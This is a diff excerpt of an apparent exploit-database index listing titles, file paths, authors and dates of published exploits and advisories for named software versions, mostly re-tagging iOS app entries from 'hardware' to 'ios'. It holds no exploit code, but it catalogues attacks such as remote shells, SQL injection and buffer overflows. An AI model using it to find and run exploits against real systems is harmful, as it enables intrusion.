26890,platforms/hardware/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,hardware,webapps,0
26890,platforms/ios/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,ios,webapps,0
26891,platforms/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - (.wav) Crash PoC",2013-07-16,ariarat,windows,dos,0
26892,platforms/windows/dos/26892.py,"Kate's Video Toolkit 7.0 - (.wav) Crash PoC",2013-07-16,ariarat,windows,dos,0
26893,platforms/php/webapps/26893.txt,"Dell Kace 1000 SMA 5.4.70402 - Persistent XSS Vulnerabilities",2013-07-16,Vulnerability-Lab,php,webapps,0
@ -24031,9 +24031,9 @@ id,file,description,date,author,platform,type,port
26949,platforms/asp/webapps/26949.txt,"Sitekit CMS 6.6 registration-form.html ClickFrom Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0
26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Local Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0
26951,platforms/windows/dos/26951.py,"Windows Movie Maker 2.1.4026.0 - (.wav) Crash PoC",2013-07-18,ariarat,windows,dos,0
26952,platforms/hardware/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0
26953,platforms/hardware/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0
26954,platforms/hardware/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,hardware,webapps,0
26952,platforms/ios/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0
26953,platforms/ios/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0
26954,platforms/ios/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0
26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2 and 1.4.1 (index.php, p param) - Directory Traversal Vulnerability",2013-07-18,Mahendra,php,webapps,0
26956,platforms/windows/webapps/26956.txt,"Dell PacketTrap MSP RMM 6.6.x - Multiple XSS Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0
26957,platforms/windows/webapps/26957.txt,"Dell PacketTrap PSA 7.1 - Multiple XSS Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0
@ -24118,7 +24118,7 @@ id,file,description,date,author,platform,type,port
27038,platforms/php/webapps/27038.txt,"TinyPHPForum 3.6 - Multiple Directory Traversal Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0
27039,platforms/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities",2013-07-23,Vulnerability-Lab,php,webapps,0
27041,platforms/windows/local/27041.pl,"Super Player 3500 (.m3u) - Local Stack Based Buffer Overflow",2013-07-23,jun,windows,local,0
27042,platforms/hardware/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,hardware,webapps,0
27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0
27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600
27044,platforms/hardware/remote/27044.rb,"D-Link Devices UPnP SOAP Command Execution",2013-07-23,metasploit,hardware,remote,0
27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",2013-07-23,metasploit,linux,remote,443
@ -24261,8 +24261,8 @@ id,file,description,date,author,platform,type,port
27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 folders.update.php folderid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0
27186,platforms/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 index.php $_SERVER['PHP_SELF'] XSS",2006-02-11,"GulfTech Security",php,webapps,0
27187,platforms/jsp/webapps/27187.py,"OpenEMM-2013 8.10.380.hf13.0.066 - SOAP SQL Injection / Stored XSS",2013-07-29,drone,jsp,webapps,0
27188,platforms/hardware/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent XSS",2013-07-29,Vulnerability-Lab,hardware,webapps,0
27189,platforms/hardware/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability",2013-07-29,Vulnerability-Lab,hardware,webapps,0
27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent XSS",2013-07-29,Vulnerability-Lab,ios,webapps,0
27189,platforms/ios/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability",2013-07-29,Vulnerability-Lab,ios,webapps,0
27190,platforms/php/webapps/27190.txt,"FluxBB 1.5.3 - Multiple Vulnerabilities",2013-07-29,LiquidWorm,php,webapps,0
27191,platforms/windows/local/27191.py,"Novell Client 2 SP3 - Privilege Escalation Exploit",2013-07-29,sickness,windows,local,0
27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 index.php lang Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0
@ -24445,7 +24445,7 @@ id,file,description,date,author,platform,type,port
27373,platforms/php/webapps/27373.txt,"TextfileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0
27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 search.php keyword Variable POST Method XSS",2006-03-09,Kiki,php,webapps,0
27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 comments_do.php Multiple Variable POST Method XSS",2006-03-09,Kiki,php,webapps,0
27376,platforms/hardware/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,hardware,webapps,0
27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0
27377,platforms/windows/dos/27377.txt,"Easy File Sharing Web Server 3.2 Format String DoS",2006-03-09,"Revnic Vasile",windows,dos,0
27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0
27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x Subject Field HTML Injection Vulnerability",2006-03-09,liz0,php,webapps,0
@ -24714,8 +24714,8 @@ id,file,description,date,author,platform,type,port
27650,platforms/php/webapps/27650.txt,"FarsiNews 2.1/2.5 Search.PHP Cross-Site Scripting Vulnerability",2006-04-14,"amin emami",php,webapps,0
27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 Index.PHP Cross-Site Scripting Vulnerability",2006-04-15,Qex,php,webapps,0
27652,platforms/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80
27655,platforms/hardware/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,hardware,webapps,0
27656,platforms/hardware/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,hardware,webapps,0
27655,platforms/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0
27656,platforms/ios/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0
27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 HTML Injection Vulnerability",2006-04-15,Qex,php,webapps,0
27659,platforms/php/webapps/27659.txt,"phpFaber TopSites Index.PHP Cross-Site Scripting Vulnerability",2006-04-17,botan,php,webapps,0
27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 Functions.PHP Remote File Include Vulnerability",2006-04-17,r0t,php,webapps,0
@ -25124,7 +25124,7 @@ id,file,description,date,author,platform,type,port
28078,platforms/php/webapps/28078.txt,"e107 0.7.5 Subject field HTML injection Vulnerability",2006-06-21,"EllipSiS Security",php,webapps,0
28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0
28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 (.wav) - Crash PoC",2013-09-04,ariarat,windows,dos,0
28081,platforms/multiple/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",multiple,remote,0
28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 and OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0
28082,platforms/windows/remote/28082.rb,"MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",2013-09-04,metasploit,windows,remote,0
28083,platforms/windows/remote/28083.rb,"HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,metasploit,windows,remote,0
28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0
@ -25276,7 +25276,7 @@ id,file,description,date,author,platform,type,port
28233,platforms/php/webapps/28233.txt,"Calendar Module 1.5.7 For Mambo Com_Calendar.PHP Remote File Include Vulnerability",2006-07-17,Matdhule,php,webapps,0
28234,platforms/linux/dos/28234.txt,"MySQL 4.x/5.x Server Date_Format Denial of Service Vulnerability",2006-07-18,"Christian Hammers",linux,dos,0
28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x LHA Filename Handling Buffer Overflow Vulnerability",2006-07-18,"Ryan Smith",windows,remote,0
28236,platforms/hardware/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,hardware,webapps,0
28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0
28237,platforms/windows/dos/28237.py,"Target Longlife Media Player 2.0.2.0 (.wav) - Crash PoC",2013-09-12,gunslinger_,windows,dos,0
28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability MS13-067",2013-09-12,Vulnerability-Lab,windows,webapps,0
28239,platforms/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple CSRF Vulnerabilities",2013-09-12,"Ivano Binetti",hardware,webapps,0
@ -25988,10 +25988,10 @@ id,file,description,date,author,platform,type,port
28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection and Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0
28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,metasploit,windows,remote,0
28974,platforms/windows/remote/28974.rb,"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",2013-10-15,metasploit,windows,remote,0
28975,platforms/hardware/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,hardware,webapps,0
28976,platforms/hardware/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include Vulnerability",2013-10-15,Vulnerability-Lab,hardware,webapps,0
28977,platforms/hardware/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,hardware,webapps,0
28978,platforms/hardware/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass Vulnerability",2013-10-15,Vulnerability-Lab,hardware,webapps,0
28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include Vulnerability",2013-10-15,Vulnerability-Lab,ios,webapps,0
28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0
28978,platforms/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass Vulnerability",2013-10-15,Vulnerability-Lab,ios,webapps,0
28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0
28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 Functions.PHP Remote File Include Vulnerability",2006-11-11,_ANtrAX_,php,webapps,0
28981,platforms/multiple/remote/28981.txt,"IBM WebSphere 6.0 Faultactor Cross-Site Scripting Vulnerability",2006-11-13,"Nuri Fattah",multiple,remote,0
@ -26599,7 +26599,7 @@ id,file,description,date,author,platform,type,port
29630,platforms/windows/local/29630.c,"Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability",2007-02-22,3APA3A,windows,local,0
29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 modules/out.php id Parameter XSS",2007-02-22,"laurent gaffie",php,webapps,0
29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 admin/index.php Multiple Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
29633,platforms/hardware/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Stored XSS",2013-11-16,"Ali Raza",hardware,webapps,0
29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Stored XSS",2013-11-16,"Ali Raza",ios,webapps,0
29634,platforms/php/webapps/29634.txt,"Plantilla list_main_pages.php nfolder Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
29635,platforms/php/webapps/29635.txt,"Pheap 1.x/2.0 Edit.PHP Directory Traversal Vulnerability",2007-02-22,"laurent gaffie",php,webapps,0
29636,platforms/php/webapps/29636.txt,"LoveCMS 1.4 install/index.php step Parameter Remote File Inclusion",2007-02-22,"laurent gaffie",php,webapps,0
@ -26943,7 +26943,7 @@ id,file,description,date,author,platform,type,port
29997,platforms/php/webapps/29997.txt,"Campsite 2.6.1 UrlType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 User.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 UserType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30000,platforms/hardware/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,hardware,webapps,0
30000,platforms/ios/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,ios,webapps,0
30002,platforms/php/webapps/30002.txt,"Wordpress Formcraft Plugin - SQL Injection Vulnerability",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0
30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
@ -26972,7 +26972,7 @@ id,file,description,date,author,platform,type,port
30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 Web Mail HTML Injection Vulnerability",2007-05-12,"Alla Bezroutchko",php,webapps,0
30028,platforms/php/webapps/30028.txt,"EQDKP <= 1.3.1 Show Variable Cross-Site Scripting Vulnerability",2007-05-12,kefka,php,webapps,0
30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 Search.PHP Cross-Site Scripting Vulnerability",2007-05-14,"Jesper Jurcenoks",php,webapps,0
30031,platforms/hardware/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,hardware,webapps,0
30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0
30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow/SEH Buffer Overflow/DEP Bypass with ROP",2013-12-04,metacom,windows,local,0
30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injection Vulnerabilities",2007-05-14,"Jesper Jurcenoks",php,webapps,0
30036,platforms/php/webapps/30036.html,"WordPress 2.1.3 Akismet Plugin Unspecified Vulnerability",2007-05-14,"David Kierznowski",php,webapps,0
@ -26994,7 +26994,7 @@ id,file,description,date,author,platform,type,port
30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0
30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0
30054,platforms/jsp/webapps/30054.txt,"Sonicwall GMS 7.x - Filter Bypass & Persistent Vulnerability (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0
30055,platforms/hardware/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,hardware,webapps,0
30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0
30059,platforms/php/webapps/30059.py,"Eaton Network Shutdown Module <= 3.21 - Remote PHP Code Injection",2013-12-06,"Filip Waeytens",php,webapps,0
30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0
30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote and Local File Disclosure Vulnerability",2013-12-06,"aceeeeeeeer .",php,webapps,0
@ -27077,8 +27077,8 @@ id,file,description,date,author,platform,type,port
30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow Vulnerability",2007-06-04,"KaiJern Lau",linux,remote,0
30143,platforms/php/webapps/30143.txt,"WebStudio CMS Index.PHP Cross-Site Scripting Vulnerability",2007-06-04,"Glafkos Charalambous ",php,webapps,0
30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 eSellerateControl365.DLL ActiveX Control Buffer Overflow Vulnerability",2007-06-04,shinnai,windows,remote,0
30145,platforms/hardware/webapps/30145.txt,"Feetan Inc WireShare v1.9.1 iOS - Persistent Vulnerability",2013-12-08,Vulnerability-Lab,hardware,webapps,0
30146,platforms/hardware/webapps/30146.txt,"Print n Share v5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,hardware,webapps,0
30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare v1.9.1 iOS - Persistent Vulnerability",2013-12-08,Vulnerability-Lab,ios,webapps,0
30146,platforms/ios/webapps/30146.txt,"Print n Share v5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0
30152,platforms/php/webapps/30152.txt,"My Databook diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0
30153,platforms/php/webapps/30153.txt,"My Databook diary.php year Parameter XSS",2007-06-04,Serapis.net,php,webapps,0
30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0
@ -27131,7 +27131,7 @@ id,file,description,date,author,platform,type,port
30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE",2013-12-11,rgod,windows,remote,0
30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80
30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0
30215,platforms/hardware/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,hardware,webapps,0
30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0
30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 AuthError.CFM Multiple Cross Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0
30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0
30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0
@ -27155,7 +27155,7 @@ id,file,description,date,author,platform,type,port
30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - (.pls) DEP Exploit",2013-12-12,"Morteza Hashemi",windows,local,0
30245,platforms/hardware/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-12,Vulnerability-Lab,hardware,webapps,0
30245,platforms/ios/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-12,Vulnerability-Lab,ios,webapps,0
30246,platforms/php/webapps/30246.txt,"WHMCS 4.x & 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0
30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0
30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 Plugin.PHP Authentication Bypass Vulnerability",2007-06-27,"Nico Leidecker",php,webapps,0
@ -27193,6 +27193,7 @@ id,file,description,date,author,platform,type,port
30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework <= 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0
30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 Oku.ASP SQL Injection Vulnerability",2007-07-07,GeFORC3,asp,webapps,0
30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow Vulnerability",2007-07-09,"Daniel Soeder",linux,remote,0
30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability",2007-07-10,"Thor Larholm",linux,remote,0
30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 Template Parameter Local File Include Vulnerability",2007-07-10,"Tim Brown",linux,remote,0
30287,platforms/windows/remote/30287.txt,"TippingPoint IPS Unicode Character Detection Bypass Vulnerability",2007-07-10,Security-Assessment.com,windows,remote,0
@ -27214,7 +27215,7 @@ id,file,description,date,author,platform,type,port
30303,platforms/php/webapps/30303.txt,"Dating Gold 3.0.5 secure.admin.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
30308,platforms/windows/local/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,local,0
30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0
30311,platforms/hardware/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,hardware,webapps,0
30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0
30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 showuser who Parameter XSS",2007-07-14,"Christopher Schwardt",php,webapps,0
30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR TakeProfEdit.PHP HTML Injection Vulnerability",2007-07-16,PescaoDeth,asp,webapps,0
30314,platforms/windows/dos/30314.txt,"Yahoo! Messenger <= 8.1 Address Book Remote Buffer Overflow Vulnerabilitiy",2007-07-16,"Rajesh Sethumadhavan",windows,dos,0
@ -27251,7 +27252,7 @@ id,file,description,date,author,platform,type,port
30371,platforms/php/webapps/30371.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0
30373,platforms/windows/remote/30373.py,"Ability Mail Server 2013 (3.1.1) - Stored XSS (Web UI)",2013-12-17,"David Um",windows,remote,0
30374,platforms/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability",2013-12-17,"Arash Allebrahim",windows,local,0
30375,platforms/windows/local/30375.txt,"FileMaster SY-IT v3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,windows,local,0
30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT v3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0
30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0
30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 Mail A Friend Open Email Relay Vulnerability",2007-07-24,"Adrian Pastor",php,webapps,0
30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 Resname Parameter Cross-Site Scripting Vulnerability",2007-07-24,"Aria-Security Team",php,webapps,0
@ -27336,7 +27337,7 @@ id,file,description,date,author,platform,type,port
30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution",2013-12-24,metasploit,unix,remote,8080
30474,platforms/windows/remote/30474.rb,"Firefox 5.0 - 15.0.1 - __exposedProps__ XCS Code Execution",2013-12-24,metasploit,windows,remote,0
30475,platforms/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",cgi,webapps,80
30476,platforms/hardware/webapps/30476.txt,"Song Exporter v2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,hardware,webapps,80
30476,platforms/ios/webapps/30476.txt,"Song Exporter v2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80
30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0
30478,platforms/php/webapps/30478.txt,"php MBB cms 004 - Multiple Vulnerabilities",2013-12-24,"cr4wl3r ",php,webapps,80
30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.PHP Remote File Include Vulnerability",2007-08-09,Rizgar,php,webapps,0
@ -27810,6 +27811,7 @@ id,file,description,date,author,platform,type,port
30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0
30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
30974,platforms/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service Vulnerability",2008-01-02,greyvoip,multiple,dos,0
30975,platforms/cgi/webapps/30975.txt,"W3-mSQL Error Page Cross-Site Scripting Vulnerability",2008-01-03,vivek_infosec,cgi,webapps,0
30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 'Search.php' and Multiple Unspecified SQL Injection Vulnerabilities",2008-01-03,The:Paradox,php,webapps,0
30977,platforms/php/webapps/30977.txt,"WordPress <= 2.2.3 - wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0
@ -28074,7 +28076,7 @@ id,file,description,date,author,platform,type,port
31254,platforms/windows/remote/31254.py,"PCMAN FTP 2.07 ABOR Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 CWD Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21
31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80
